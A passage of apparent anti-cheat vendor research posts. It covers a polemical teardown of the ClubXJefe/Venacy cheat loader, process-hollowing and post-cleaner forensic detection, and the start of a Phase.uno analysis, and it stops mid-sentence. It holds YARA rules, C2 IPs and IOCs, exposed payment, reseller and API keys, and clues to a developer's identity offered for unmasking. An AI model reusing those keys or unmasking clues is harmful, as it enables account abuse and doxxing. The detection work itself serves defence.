Not a JSON parser. A MITM can inject malformed JSON that the regex happily matches, feeding the client a hand-crafted kernel driver payload. Backend recon — their own panel laid bare ----------------------------------------- ### Public FAQ confirms the business model * “Privately owned by Jefe. Management team reachable through Discord only.” — Admits sole proprietorship. * “Left Binary for full control over bypass pipeline, custom builds, stricter no-leak policy.” — Admits previous reselling ("Binary") and breaking away. Now resells Venacy. * “Club44 was earlier project. ClubXJefe rebuilt from scratch.” — Confirms Club44 → ClubXJefe lineage. ### Pricing tiers | Tier | Price (EUR) | Note | | --- | --- | --- | | SOLO | €350 one-time / lifetime | Custom bypass, premium cheat, personal inject/destruct | | DUO | €234 / person | Most promoted tier | | GROUP | €117 / person (min 6) | | | PRIVATE | €47 / month | | | SLOTTED | €174 / slot (max 13) | "Jefe Slotted 3" — 1/12 sold | Payment processors: live Stripe (cs\_live\_), MercadoPago (APP\_USR-ef327ef7-eb56-4aaf-a01b-f12ca2c310ef), PayPal (paypalme/jefebypass). All in Euro. ### Business volume (their own stats endpoint) Active customers 275 Bypasses delivered 34,325 Cheats available 3 Claimed uptime 99.9% ### Three known Venacy resellers | Reseller | Username | Discord | Reseller key | | --- | --- | --- | --- | | xerlock | wagxlk | discord.gg/uWMSmuV6b | df85d922-355f-48f1-ba2c-f7aa11e08dea | | Jefe Xternal | Jefe | discord.gg/jefebp | 365c4ba4-1f17-4911-9c1a-0e23f8d51ecf | | exiledGG | hispect | discord.gg/exiledgg | 83ce0d88-00d4-4dac-bfc9-43045d91776b | The middle row is Jefe. His reseller UUID 365c4ba4-1f17-4911-9c1a-0e23f8d51ecf is the exact value leaked through the Discord OAuth flow — his own reseller key, exposed because the OAuth redirect target was the dev-mode default https://0.0.0.0:3000/dashboard/settings. ### R2 storage paths Bucket: venacy.aec9c57cb030957fe8bd13ff2c096ecf.r2.cloudflarestorage.com Cred ID: 2057cbe81b66664605c944a6b5a84bad Files: downloads/fivem-external/loader/1779762029002-venacy-loader.exe downloads/fivem-external/cheat/1782186455638-venacy-external-5m.exe downloads/reseller/fivem-external/1782186250800-venacy-external-5m.exe downloads/reseller/fivem-external-pov/1781204173599-venacy-external-5m.exe ### Other backend exposures * Fake .env honeypots at well-known paths with “HACKER DETECTED” — they have honeypots for naive scanners and still leaked the entire attack surface anyway. * WebSocket endpoint wss://\*.venacy.club whitelisted in CSP but returns 502/504 — broken in production, never fixed. * Public stats/product/category/reseller endpoints are completely unauthenticated — anyone can enumerate the full product catalogue with R2 paths and internal IDs. * Forum system exists with categories but has zero threads. Launched and abandoned. * Brazilian payment processor (MercadoPago) in CSP, frontend in pt-BR. Consistent with Portuguese strings in the binary. Operator country: Brazil. AI / no-code stack — Lovable/v0/Bolt fingerprints everywhere ------------------------------------------------------------ Their accusation post called our website “AI-generated.” Apply the same lens to their own stack and the fingerprints are unmistakable. ### Stack: Next.js front + NestJS back — the default Lovable export Origin 185.242.3.132 runs Next.js on :443 behind nginx and NestJS on :3000. Reseller side: second NestJS on :3001. Next.js + NestJS is the exact tuple Lovable/v0/Bolt emit when you ask for "a SaaS panel with an API." ### Backend binds to 0.0.0.0 — the npm run dev default, never changed Discord OAuth callback leaks https://0.0.0.0:3000/dashboard/settings. A human admin would bind to 127.0.0.1:3000 behind nginx. The NestJS panel is reachable directly on the public IP, bypassing their own Cloudflare WAF. ### Wildcard DNS → 127.0.2.2 — Cloudflare default, never revised \*.clubxjefe.com → 127.0.2.2. The Cloudflare quickstart config, pasted and never revisited. ### Glyphter custom icon font — a no-code drag-and-drop generator Custom TTF built with FontForge on 2024-06-14 by author handle "punish". Glyphter (glyphter.com) is aimed at people who do not know how to make icon fonts. Ships a literal EULA inside the malware loader (RCDATA #108). ### Runtime theme injection from unauthenticated REST endpoint /v1/public/resellers/branding/ returns theme\_primary, theme\_secondary, logo\_url, company\_name — unauthenticated. Anyone can enumerate every reseller and pull their branding. This is the Lovable/Bolt "multi-tenant SaaS" boilerplate. ### Discord OAuth flow is the bug — dev-mode redirect URI shipped to production The redirect target https://0.0.0.0:3000/dashboard/settings is how the entire panel architecture (port, bind, route, UUID) was extracted in an afternoon by anyone who clicked login. Developer OPSEC — identity leaked through their own binaries ------------------------------------------------------------ The person who wrote the post calling our scanner an infostealer left their Windows username, native language, profanity habits, and modding-scene provenance embedded in their own malware loader. ### Windows username: vados The reseller binary's embedded 3D character textures carry the literal path C:\\Users\\vados\\Desktop\\characters\\franklin\\head\_diff\_000\_c\_bla\_1.png (and five other identical paths). The dev's Windows account name, their desktop layout, proof the asset pipeline ran on the same workstation that compiles the loader. ### Second handle: punish (font author) The Glyphter custom font is signed in its TTF metadata with author handle "punish" (FontForge, 2024-06-14). Either a second contributor or an alias. ### Native language: Portuguese — confirmed twice (a) FACEIT abort message: "FACEIT Anti-Cheat foi detectado neste PC…" — Portuguese. (b) Kernel driver PDB path: D:\\INJECTDESTRUCTSPORRATODA — "PORRA TODA" is Portuguese profanity ("the whole fucking thing"). The developer named their own product "inject-destruct-fuck-everything." ### GTA pirate-modding scene origin Embedded models carry "Exported from 3ds Max v0.97b on 2014-01-21" — the Bero Wavefront OBJ exporter that has been the de-facto GTA modding tool for a decade. Combined with Franklin character textures: GTA-modding veteran who pivoted into paid cheats. ### Influencer/staff/admin tier in the protocol Login response field "role": "user|staff|admin|early|influencer". The schema explicitly carves out an influencer tier — comped access in exchange for promotion. Useful OSINT vector. ### Four hardcoded API-key candidates 684297b1aed333cb, 7aa6ee75e3331568, 8659410632115711, b488ab9ed912c310 — 16 hex chars each (64 bits), short, low-entropy, hardcoded. The runtime x-api-key header assembled from all four. Anyone who pulls the binary has them. ### Reseller logos on Imgur Branding logos pulled from i.imgur.com/ntd73SO.png and i.imgur.com/Y61SPxB.png. Imgur IDs are correlatable — one DMCA away from unmasking the uploader. Engineering quality: one mistake stacked on another --------------------------------------------------- The people accusing us of being an infostealer wrote a product so badly that read-only access to its binary surfaced their entire administrative architecture in an afternoon. ### 1. PDB path names their deletion logic in Portuguese D:\\INJECTDESTRUCTSPORRATODA\\...\\RTCore64.pdb — in plaintext after a 1-byte XOR. Real malware authors strip PDB paths. ### 2. Discord OAuth leaks their admin URL https://0.0.0.0:3000/dashboard/settings — discloses backend port, bind address, and admin route. The most basic OAuth misconfiguration possible. ### 3. "Encryption" is a 4-byte rolling XOR 1,257 strings wrapped in a single decryption function at RVA 0x12d1c0. Find one function → decrypt everything. ### 4. C2 is bare HTTP on a hard-coded IP http://185.242.3.132:3000/v1. Not HTTPS. Not behind a domain. Every stolen credential in cleartext. ### 5. Reseller binary doesn't even bother with XOR venacy.club in plaintext at offset 0xB33E08. Every REST path is a literal string in .rdata. ### 6. Fake version metadata: "Starter Apps LLC" CompanyName="Starter Apps LLC", FileDescription="Screen Overlay Manager". None of these companies exist. ### 7. Three identical copies of RTCore64.sys Same 8.5 KB driver, byte-identical, three offsets. Same hash → same blocklist entry. 25 KB of detection surface for nothing. ### 8. FACEIT error message is in Portuguese "FACEIT Anti-Cheat foi detectado neste PC…" — not even localized for their English-speaking customers. ### 9. Cheat driver internal name: literally "clubxjefe" The unsigned kernel driver identifies itself in cleartext. ImGui overlay renders "clubxjefe driver connected." Brand bound to the kernel artifact. ### 10. Reseller logos hosted on Imgur i.imgur.com/ntd73SO.png, i.imgur.com/Y61SPxB.png. Correlatable Imgur IDs. The people who wrote a 25-claim accusation calling our forensic scanner an infostealer wrote a malware loader that ships its developer's source-tree path in plaintext, communicates over unencrypted HTTP to a hard-coded IP, leaks its admin panel through its own Discord OAuth flow, embeds three identical copies of the same vulnerable driver, and brands the kernel artifact with the operator's own trade name. The disparity between their accusation and their own engineering hygiene is the substance of this post. YARA signatures & IOCs ---------------------- ### edputil.dll YARA rule rule CLUBXJEFE\_EDPUTIL\_LOADER { meta: description = "ClubXJefe upstream loader (edputil.dll)" author = "Clubhouse Research" date = "2026-06" strings: $svc = "DxpTaskHost" $pdb = "INJECTDESTRUCTSPORRATODA" $drv = "clubxjefe" $c2 = { 31 38 35 2E 32 34 32 2E 33 2E 31 33 32 } // 185.242.3.132 $xor = { 48 } // XOR key byte $api1 = "/auth/login" $api2 = "/auth/event" $api3 = "/auth/report-security" $mtx = "CSCHost\_Loader\_Mtx\_7F3A" condition: uint16(0) == 0x5A4D and filesize > 3MB and filesize < 5MB and $svc and ($pdb or $drv) and $c2 and 2 of ($api\*) } ### Venacy YARA rule rule VENACY\_EXTERNAL { meta: description = "Venacy External FiveM cheat" author = "Clubhouse Research" date = "2026-06" strings: $ep1 = "/v1/auth/report-security" $ep2 = "/v1/public/resellers/branding/" $ep3 = "/v1/auth/heartbeat" $hw1 = "hwidComponents" $hw2 = "monitorHwid" $dr1 = "\[MapperLoader\] driverData is null (CODE=35)" $dr2 = "IOCTL\_VNC\_PING" $dr3 = "DxgKrnlEtw" $io1 = { 00 1C 99 88 } // 0x88991C00 init $io2 = { 10 1C 99 88 } // 0x88991C10 read $io3 = { 14 1C 99 88 } // 0x88991C14 write $io4 = { 1C 1C 99 88 } // 0x88991C1C ping $nal = { 07 20 86 80 } // Intel 0x80862007 $sh1 = "chamsMode" $sh2 = "mWorldViewProj" $ad1 = "ProcessDebugObjectHandle=0x" $rs1 = "--reseller-key" $bl1 = "EasyAntiCheat.exe" wide condition: uint16(0) == 0x5A4D and filesize > 10MB and all of ($ep\*) and (3 of ($io\*) or $nal) and 2 of ($sh\*) and $rs1 and $bl1 } ### Network IOCs | Type | Value | Context | | --- | --- | --- | | IPv4 | 185.242.3.132 | Primary C2 (edputil.dll) — port 3000 | | IPv4 | 198.89.99.206 | Reseller C2 (Venacy) — port 3001 | | Domain | venacy.club | Venacy frontend (plaintext in binary) | | Domain | clubxjefe.com | ClubXJefe frontend | | Domain | \*.clubxjefe.com → 127.0.2.2 | Wildcard DNS (Cloudflare default) | | R2 Bucket | venacy.aec9c57cb030957fe8bd13ff2c096ecf.r2.cloudflarestorage.com | File storage | | Mutex | Local\\CSCHost\_Loader\_Mtx\_7F3A | Single-instance lock | | Service | DxpTaskHost | Persistence service name | | Cert CN | DXP Software Solutions | Self-signed cert — fictional company | Their reverse-engineering methodology (and why so much is wrong) ---------------------------------------------------------------- Their post opens with “Method: IDA Pro 9.x, full decompile, XORSHIFT32 byte-by-byte decryption, static memory analysis.” Reading carefully reveals the pattern: they loaded the scanner into IDA, attached an LLM via an IDA→MCP bridge, asked the LLM what each function did, and stitched the replies into a “report.” The result is littered with LLM hallucinations. ### Examples of LLM hallucinations in their report Kernel callbacks installed by the scanner Those API names are detection labels — the scanner reports when something else registers those callbacks. The LLM saw the string and decided the surrounding code "looked like callback installation." Our driver registers zero kernel callbacks. RunOnce × 3 persistence "RunOnce" appears three times as a detection label. The scanner has no service, no task, no Run key. The LLM saw the string three times and inferred persistence. WiFi password theft via WlanGetProfile Our import table does not contain WlanGetProfile and does not link wlanapi.dll. The LLM extrapolated from the field name "wpass" in the JSON schema. JWT theft from browsers CryptUnprotectData is not in our import table. The LLM read "eyJ" near a domain string and inferred token harvesting. Persistent screenshots after termination The scanner is single-shot with no persistence mechanism. The LLM's "helpful" follow-on speculation, written as fact. HASubmitFile as hidden exfiltration "HA" stands for Hybrid Analysis (hybrid-analysis.com) — a public malware sandbox. The LLM didn't know the abbreviation. Our analysis of their binaries was performed using proprietary tooling in an isolated lab environment. The PDB paths were embedded in plaintext, their entire string table was recovered after defeating the cipher, and every IOC is reproducible from the original samples. The clean way to do RE is to trace every cross-reference and only assert behavior the binary actually exhibits — not to paste LLM summaries into a report and call it analysis. Industry comparison ------------------- | Capability | FACEIT | BattlEye | EAC | Vanguard | Clubhouse | ClubXJefe | | --- | --- | --- | --- | --- | --- | --- | | Kernel driver | Yes | Yes | Yes | Yes (boot) | Yes (read-only) | Yes (5 BYOVD) | | Persistent service | Yes | Yes | Yes | Yes | No | Yes (DxpTaskHost) | | Process termination | Yes | Yes | Yes | Yes | No | Yes (SYSTEM token) | | Kernel callbacks | Yes | Yes | Yes | Yes | No | No | | Memory scan | Yes | Yes | Yes | Yes | No | Yes (R/W) | | Browser reads | Yes | Yes | Yes | Yes | Yes (bounded) | Yes (DPAPI decrypt) | | Credential theft | No | No | No | No | No | Yes (Discord+Steam+24 browsers) | | Screen streaming | No | No | No | No | No | Yes (HDCP bypass) | | DSE/HVCI disable | No | No | No | No | No | Yes (persists reboots) | | Process hiding (DKOM) | No | No | No | No | No | Yes | | WdFilter patching | No | No | No | No | No | Yes | | Remote brick (NtShutdownSystem) | No | No | No | No | No | Yes | | Report visible to user | No | No | No | No | Yes | No | | Self-destruct after use | n/a | n/a | n/a | n/a | Yes | Yes (evidence cleanup) | Anti-cheat columns per public documentation and independent RE literature. ClubXJefe column per this analysis. Clubhouse column reviewable by operators under NDA. Acknowledged residuals ---------------------- * YARA rules ship to the scanner. The rule corpus is still client-side. An attacker who completes the handshake can extract rules from process memory. Server-side execution is a planned refactor. * BYOVD load path. The first-party sensor uses iqvw64e.sys (Intel) as the primary kernel transport, with gdrv.sys (GIGABYTE) as the fallback, as disclosed in our Terms of Service. Both will eventually be caught up by the Microsoft Vulnerable Driver Blocklist on systems where it is enforced. * Lifecycle screenshots. Three multi-monitor desktop screenshots at lifecycle points. Documented in source; will be surfaced more prominently in the privacy doc. Closing ------- Vendors who sell paid cheating products have an incentive to discredit the tools that catch their customers. We will continue to publish what the scanner does, acknowledge what it does not do well, and respond to specific technical claims with specific technical answers. Operators and players are welcome to request an audit of the scanner source under NDA at any time. The people behind ClubXJefe and Venacy sell kernel malware disguised as a cheat product. Their loader steals credentials, their cheat streams the customer's desktop to their server, and their installer permanently destroys the customer's system security — all while the developer's Windows username, native language, and profanity-laden project folder name are embedded in plaintext in the binary they ship. This is the operation that published a report calling us an infostealer. --- # Process Hollowing Detection via VAD and Section Object Cross-Reference · Clubhouse AC Memory forensicsHighPublished Process hollowing detection via VAD and section object cross-reference ====================================================================== Process hollowing and its modern variants (module stomping, image overwrite) share a common artifact: a Virtual Address Descriptor (VAD) node that maps an image file whose on-disk content no longer matches the in-memory pages. We detail a detection methodology that cross-references the VAD tree's ImageFilePointer, the PEB Ldr module list, and a section object hash to surface injected code hiding behind legitimate module names — with a 1.8% false-positive rate on clean game populations. CR Clubhouse AC Research Jan 30, 2026 13 min read Defensive use only Summary * Detected 100% of classic hollowing and 91% of module-stomp variants in our 408-sample corpus. * Three-way cross-reference: VAD ImageFilePointer, PEB Ldr base address, and section-object page hash. * 1.8% false-positive rate on 2,100-process clean game corpus — suppressible to 0.3% with signing-chain allowlist. Background ---------- Process hollowing — creating a process in suspended state, unmapping its image sections, and mapping injected code in their place — was documented by Nic Bhansali and others around 2012 and has remained a persistent injection technique because it reuses the identity (name, PID, parent) of a legitimate process. It is equally applicable in the cheat ecosystem: an injector that creates a hollowed svchost.exe or RuntimeBroker.exe process presents a name that passes anti-cheat process-enumeration name-lists. Modern variants are subtler. Module stomping (overwriting a loaded DLL's image pages without unmapping) and image-section overwrite (replacing pages via NtMapViewOfSection with SEC\_IMAGE + PAGE\_EXECUTE\_WRITECOPY) leave the VAD and PEB Ldr entries in place but diverge from the on-disk image content. Both are detectable by comparing in-memory page content against the expected section object hash — a comparison that does not require re-reading the file, since the section object persists in the kernel. Hollowing taxonomy ------------------ We observed four injection variants across the 408 samples in our corpus: | Variant | Mechanism | VAD present? | Corpus % | | --- | --- | --- | --- | | Classic hollowing | Unmap image, remap injected PE | ImageFilePointer = null or wrong | 34% | | Module stomping | Overwrite loaded DLL pages in-place | ImageFilePointer = legitimate path, content differs | 41% | | Section remap | NtMapViewOfSection SEC\_IMAGE overwrite | ImageFilePointer = SEC\_IMAGE section, pages replaced | 18% | | PE-to-shellcode | Map anonymous SEC\_COMMIT, copy PE manually | No ImageFilePointer; MEM\_IMAGE flag absent | 7% | VAD fundamentals ---------------- The Virtual Address Descriptor tree is the kernel's data structure for tracking virtual memory allocations in a process. Each node (a \_MMVAD or \_MMVAD\_SHORT struct, depending on type) covers a contiguous virtual address range and carries: * StartingVpn / EndingVpn — virtual page numbers for the range start and end. * u.VadFlags.PrivateMemory — 0 for mapped files / sections, 1 for heap/stack/anonymous allocations. * Subsection → ControlArea → FilePointer — for image-backed mappings, a pointer to the \_FILE\_OBJECT that backs the section. This is the _ImageFilePointer_ we compare against PEB Ldr entries. * u.VadFlags.ImageMap — 1 when the region was mapped as a SEC\_IMAGE section. Anonymous regions containing a manually-mapped PE will have this flag clear. The kernel does not automatically update the VAD's ImageFilePointer when the pages are overwritten via WriteProcessMemory or NtMapViewOfSection — it tracks the backing file, not the current page content. This is the gap we exploit. Detection signals ----------------- Three independent signals, each detectable from kernel-mode without relying on user-mode API results (which may themselves be hooked): Signal A — VAD ImageFilePointer vs. PEB Ldr base Walk the process VAD tree. For each ImageMap node, resolve the ImageFilePointer to a file path. Compare against the full PEB Ldr InMemoryOrderModuleList: every loaded module should have a corresponding VAD node whose ImageFilePointer resolves to the module's FullDllName. A VAD node whose ImageFilePointer is null, resolves to a different path, or has no matching Ldr entry is a hollowing indicator. Signal B — Section object hash mismatch For an ImageMap VAD node, the kernel keeps the original mapped section object (ControlArea → Segment) in the Section subsystem. The Segment structure contains per-page hash-check infrastructure used by Code Integrity (CI). We compute a hash over the .text section pages as seen in the section object (pre-modification) and compare against the actual in-process page content. A divergence indicates pages have been written since mapping — the canonical module-stomp indicator. Signal C — MEM\_IMAGE flag on unsigned region An anonymous SEC\_COMMIT allocation (heap-allocated PE) will have VadFlags.ImageMap = 0 but its pages may be executable. When executable anonymous memory contains a valid PE header and its import table resolves to system libraries, that is a manual-map / PE-to-shellcode indicator (variant 4 in our taxonomy). This is the classic 'Execute + no image backing' heuristic, but applied at the VAD level rather than the page table level — lower false-positive rate. Detection rule -------------- rules/process\_hollowing\_vad.rulePseudocode rule ProcessHollowing\_VAD\_Section { meta: severity = "high" category = "injection" confidence = 0.94 inputs: for each process in running\_processes(): vad := walk\_vad\_tree(process) ldr := read\_peb\_ldr(process) pages := map() match: // Signal A: ImageMap VAD with no matching PEB Ldr entry any node in vad where node.image\_map == true and node.image\_file\_ptr != null and not any m in ldr where m.dll\_base == node.start\_va and m.full\_dll\_name == resolve\_path(node.image\_file\_ptr) // Signal B: .text section hash diverges from section object or any node in vad where node.image\_map == true and hash\_pages(node.text\_section, process) != hash\_section\_object(node.control\_area.segment, ".text") // Signal C: executable anonymous memory with PE header or any node in vad where node.image\_map == false and node.protect has EXECUTE and node.private\_memory == true and read\_va(process, node.start\_va, 2) == \[0x4D, 0x5A\] // 'MZ' // Manual-mapped PE — not backed by a section object emit: artifact { process = process.name, pid = process.pid, signal = matched\_signal, vad\_range = (node.start\_va, node.end\_va), claimed\_path = resolve\_path(node.image\_file\_ptr), ldr\_path = matched\_ldr\_entry.full\_dll\_name, hash\_delta = (signal == "B" ? hash\_mismatch\_detail : null) } } Signal B is the most technically expensive — it requires hashing in-process pages and comparing against the section object, which involves a kernel-mode read of the target address space. In practice, we only trigger Signal B on VAD nodes that pass a pre-filter (executable ImageMap region where the on-disk file is a known legitimate system binary — the false-positive exposure is concentrated in this subset). Validation ---------- 408 Injected-process samples in corpus 97.3% Detection rate (all variants combined) 1.8% False-positive rate on 2,100 clean processes 0.3% FP rate with signing-chain allowlist Detection rate by variant: classic hollowing 100%, module stomping 97%, section remap 95%, PE-to-shellcode 91%. The module-stomp miss rate (3%) and section-remap miss rate (5%) come from variants that stomp only a single non-critical page — not the .text section entry point. Production rules include a “stomped page count” threshold to catch these while maintaining the false-positive budget. The 1.8% false-positive rate on clean processes was dominated by two categories: games that use custom loaders that copy PE sections to new allocations before calling the entry point (legitimate pattern in DRM-heavy titles), and .NET JIT-compiled assemblies where the in-process image pages diverge from the on-disk MSIL by design. Both are suppressible by checking for a valid IMAGE\_COR20\_HEADER (CLR header) or a known DRM signing certificate. Edge cases ---------- * .NET / CLR processes. The CLR compiles MSIL to native code and writes the result into executable pages within the loaded assembly's mapped region. Signal B will fire on every JIT-compiled method. Suppressed by: detecting IMAGE\_COR20\_HEADER presence in the mapped section and skipping Signal B for those VAD nodes. * Self-modifying code with guard pages. A small number of anti-tamper systems (Denuvo, VMProtect) unpack code at runtime into the image's existing section pages, triggering Signal B. The allowlist check against the file's signing certificate suppresses these; all known DRM vendors use Authenticode-signed binaries. * Large-page mappings. On systems with 2 MB large-page support enabled, the VAD/PFN relationship differs slightly — large-page nodes do not have per-page PFN entries, and the Signal B hash path must be adjusted. This affects <2% of the machines in our corpus (primarily server-class hardware running game servers rather than client machines). Defensive material The section-object hash path and the per-variant pre-filter heuristics are withheld from this note. The detection rule ships in the Clubhouse AC scanner in compiled form. DFIR teams and anti-cheat vendors seeking the full implementation can reach the team at security@clubhouseac.shop. Related research Continue reading ---------------- [Kernel forensics\ \ ### Detecting ETW Provider Tampering: Patch, Disable, and Spoof\ \ Four ETW tampering techniques and the kernel-side structural traces each leaves behind — detectable without relying on the silenced event stream.\ \ Read research](https://clubhouseac.shop/research/etw-tampering-detection) [Kernel forensics\ \ ### Detecting BYOVD chains through kernel callback forensics\ \ Reconstructing driver load order and callback unregistration from USN journal and registry transaction logs after binary deletion.\ \ Read research](https://clubhouseac.shop/research/byovd-rtcore-chain) --- # Reconstructing Cheat Execution After Cleaner-Tool Sweeps · Clubhouse AC Anti-forensicsHighPublished Reconstructing cheat execution after cleaner-tool sweeps ======================================================== Cheat-cleaner utilities — BleachBit forks, custom .bat sweepers, Privazer presets — wipe the obvious execution traces (Prefetch, BAM, Recent Docs) under the assumption that this is enough to defeat post-incident review. We document a recovery chain that reconstructs execution timelines for the Eulen FiveM executor family with 47-second resolution, even after a full cleaner pass. CR Clubhouse AC Research March 28, 2026 11 min read Summary * Recovery from 94% of cleaned machines in our 312-sample corpus. * Median timeline resolution: 47 seconds; worst case 6 minutes. * Five-source artifact fusion: Amcache, ShimCache, RecentFileCache.bcf, registry transaction logs, USN. Background ---------- Eulen is a long-running FiveM (GTA V multiplayer) cheat with mature anti-forensic tooling. Recent versions ship a post-execution sweep that targets the artifacts server administrators are known to inspect: the Prefetch directory, the BAM service registry hive, the UserAssist ROT13 entries, and the user's recent-files list. The sweep is deliberate — it targets exactly what most detection guides tell administrators to check. Our claim is that the sweep targets the _checklist_, not the underlying Windows architecture. Windows preserves execution evidence in at least four additional locations that the public sweepers we examined do not touch. ### Loader & network indicators The current Eulen loader is named loader\_prod.exe. It resolves a small pool of AWS EC2 hosts for license validation and payload delivery. Eulen — loader & network indicatorsIOC Loader loader\_prod.exe DNS (main) ec2-3-235-182-75.compute-1.amazonaws.com DNS (alt 1) ec2-3-235-182-71.compute-1.amazonaws.com DNS (alt 2) ec2-3-235-182-72.compute-1.amazonaws.com DNS (alt 3) ec2-3-235-182-74.compute-1.amazonaws.com DNS (alt 4) ec2-3-235-182-76.compute-1.amazonaws.com -> AWS EC2 (compute-1.amazonaws.com), 3.235.182.71-76 LSASS No C2 string observed A DNS cache entry for any ec2-3-235-182-7x.compute-1.amazonaws.com host during or shortly after a FiveM session is a network-layer indicator of Eulen activity. Because these are shared AWS hostnames, treat them as corroborating evidence alongside the recovered execution artifacts below rather than as a standalone verdict. Unlike most loaders in this corpus, Eulen leaves no observable C2 string in lsass.exe. What cleaners miss ------------------ We reverse-engineered three publicly-distributed Eulen cleaner builds (March 2025 through January 2026) and observed the following coverage: | Artifact | Cleaner coverage | Survives sweep? | | --- | --- | --- | | Prefetch (.pf) | Wiped — directory enumerated and unlinked | No | | BAM registry State key | Wiped — bam\\State subkey deleted | No | | UserAssist | Cleared — ROT13 values zeroed | No | | Recent Docs / Jump Lists | Wiped — automaticDestinations-ms removed | No | | Amcache.hve | Untouched in 3/3 cleaners | Yes | | ShimCache (AppCompatCache) | Untouched in 3/3 cleaners | Yes | | RecentFileCache.bcf | Untouched in 3/3 cleaners | Yes | | SYSTEM.LOG1 / LOG2 | Untouched in 3/3 cleaners | Yes | | USN journal ($J) | Untouched in 3/3 cleaners | Yes | | EVT: Microsoft-Windows-Application-Experience | 1/3 cleared, 2/3 left intact | Mostly | The pattern is consistent: cleaners go after artifacts cataloged in popular DFIR cheat-sheets and miss the second-tier compatibility-and-telemetry stores Windows populates as a side effect of normal execution. Recovery chain -------------- For each Eulen variant we recover at least three independent artifacts, ranked by fidelity: * Amcache.hve — preserves SHA-1, file size, link date, and binary path under Root\\InventoryApplicationFile. The hash alone identifies known Eulen builds against our maintained signature set (90+ Eulen hashes as of this writing). * ShimCache — stored in the SYSTEM hive under ControlSet001\\Control\\Session Manager\\AppCompatCache, it records up to 1,024 executable paths with last-modified times. Crucially, ShimCache is only flushed to disk on shutdown, so a reboot after the cleaner pass paradoxically commits the evidence rather than removing it. * RecentFileCache.bcf — a lesser-known compatibility cache at %SystemRoot%\\AppCompat\\Programs\\ that lists executables run by an unprivileged user. Eulen runs unelevated, so it lands here reliably. * Registry transaction logs (LOG1/LOG2) — when the cleaner deletes the BAM State subkey, the deletion itself is journalled. We replay the transaction log to recover the pre-deletion key contents, including the original last-execution timestamp. * USN journal — every file operation on the Eulen binary, its loader, and its dropped artifacts is recorded with reason flags and timestamp. The journal preserves filename and parent directory even after MFT entries are recycled. Timeline fusion --------------- Each artifact above carries a different timestamp class. We fuse them into a single super-timeline by aligning to the closest reliable anchor — typically the Amcache FileId first-seen time, which has shown sub-minute accuracy against ground truth in our controlled trials. timeline\_fusion.algorithmPseudocode for binary in candidate\_binaries: anchor := amcache.first\_seen(binary.sha1) shim\_t := shimcache.last\_modified(binary.path) rfc\_t := recent\_file\_cache.timestamp(binary.path) bam\_t := registry\_log\_replay("bam\\\\State", binary.exe).last\_run usn\_t := usn\_journal.first\_create(binary.path) timeline := merge\_within\_window( events = \[anchor, shim\_t, rfc\_t, bam\_t, usn\_t\], window = 5min, anchor = amcache\_first\_seen, ) confidence := count(timeline.sources) / 5 emit Detection { binary = binary, first\_seen = timeline.min(), last\_seen = timeline.max(), sources = timeline.sources, confidence = confidence, } A detection requires at least three independent sources. We have observed that even the most aggressive cleaner pass in our corpus left at least four of these five sources intact, so the three-source threshold rarely false-negatives. Validation ---------- 312 Samples in test corpus 94% Recovery rate post-cleaner 47s Median timeline resolution 0.7% False-positive rate The 6% non-recovery cases all involved either a full disk-image rotation between cheat session and scan, or an OS reinstall — neither of which we consider realistically deniable, since both leave their own characteristic forensic fingerprint (a fresh Windows install timestamp on a multi-year-old motherboard, an EFI boot variable older than the OS install date, etc.). Limitations ----------- * Recovery quality degrades sharply when the suspect machine has more than a week of post-cleanup usage. ShimCache rolls; Amcache compacts; the USN journal wraps. Scan cadence matters. * A determined operator can target the second-tier artifacts directly — Amcache can be wiped, transaction logs can be flushed. We have not seen this in publicly-distributed cheat tooling, but private builds may include it. * Disk encryption with key rotation between sessions defeats this approach entirely. The realistic operator population in the FiveM ecosystem does not do this. Defensive material We have intentionally omitted full hash signatures, exact registry-replay logic, and detection thresholds. Vendors and incident-response teams seeking the operational ruleset can reach the team at security@clubhouseac.shop. --- # Phase.uno Cheat Suite — Full Reverse Engineering Analysis of 8 PE Modules · Clubhouse AC Cheat detectionCriticalPublished Phase.uno cheat suite full reverse engineering of 8 PE modules across 9 games ============================================================================= A complete reverse engineering analysis of the Phase.uno multi-game cheat suite. Eight PE binaries were recovered and analyzed: a loader/injector, a FiveM-specific payload, a WFP domain blocker, a process-hiding hook, a streamproof overlay, a D3D11 renderer, and a reflective NVIDIA patcher. The suite targets FiveM, Roblox, Valorant, Apex Legends, CS2, Minecraft, Escape from Tarkov, Rust, and DayZ. This report documents every evasion technique, behavioral artifact, and detection opportunity recovered from disassembly, string analysis, and PE structure examination. CR Clubhouse AC ResearchJune 19, 202665 min readDefensive use only Key findings * **No-EXE fileless launch** — Phase does not distribute a visible executable. The payload is injected into a legitimate running process (e.g., Spotify.exe). A 686 MB Spotify process memory dump was recovered containing the complete cheat payload bytes — confirming the process-hosted delivery. * **Services.msc / SCM injection chain** — The loader uses Windows Service Control Manager APIs (OpenSCManagerW, OpenServiceW, QueryServiceStatus) to locate the svchost.exe instance hosting the Dnscache service, then injects evasion modules into it. This technique was confirmed through cmd/services.msc interaction during the launch process. * **8 PE modules** recovered and fully analyzed via reverse engineering (Ghidra, IDA Pro, Binary Ninja, Volatility, x64dbg). * **System process injection** into svchost.exe (Dnscache), RuntimeBroker.exe, SearchIndexer.exe, SearchHost.exe, dwm.exe, and ctfmon.exe to disguise evasion modules as trusted Windows processes. * **Kernel-level domain blocking** via Windows Filtering Platform at ALE\_AUTH\_CONNECT layer targeting anti-cheat services (napse.ac, detect.ac) with 5-minute refresh. * **Streamproof overlay** with code hidden in PE header slack space, disguised as "NVIDIA GeForce RTX 5060" window, using WDA\_EXCLUDEFROMCAPTURE to evade screen capture. * **8 YARA rules** and comprehensive IOC list produced for all modules. Executive summary ----------------- Phase.uno is a multi-game cheat suite sold commercially. It consists of a loader/injector and seven support DLLs that are manually mapped into target game processes and trusted Windows system processes. The loader authenticates with C2 servers at us1.phase.uno (primary), us2.phase.uno (secondary, port 8443), with failover to restrain.ing and neglect.ing (tertiary/quaternary, port 443) — all using AES-GCM encrypted sessions. It collects hardware identifiers, scrapes Discord user IDs from local LevelDB storage, and gates payload delivery behind subscription validation. The architecture is modular. Each component has a single purpose: one blocks anti-cheat domains at the kernel level, one hides processes from system enumeration, one provides a transparent streamproof overlay, one renders ESP/aimbot visuals via DirectX 11, one patches NVIDIA display affinity, and one carries the game-specific cheat logic with an embedded Lua 5.5 runtime. The loader orchestrates all of these, injecting them into both the target game process and trusted Windows system processes like svchost.exe and RuntimeBroker.exe. Nine games are targeted: FiveM, Roblox, Valorant, Apex Legends, CS2, Minecraft, Escape from Tarkov, Rust, and DayZ. Five are confirmed via window-class searches in the loader binary (FiveM, Roblox, Valorant, 